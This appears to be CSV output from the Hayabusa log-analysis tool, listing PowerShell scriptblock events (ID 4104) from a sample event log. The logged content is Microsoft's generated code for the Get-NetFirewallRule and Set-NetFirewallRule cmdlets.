[string[]] ${LocalPort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Par",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"atedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallRule' -Alias '*' function Set-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Owner}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Par",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter)",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter)",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = 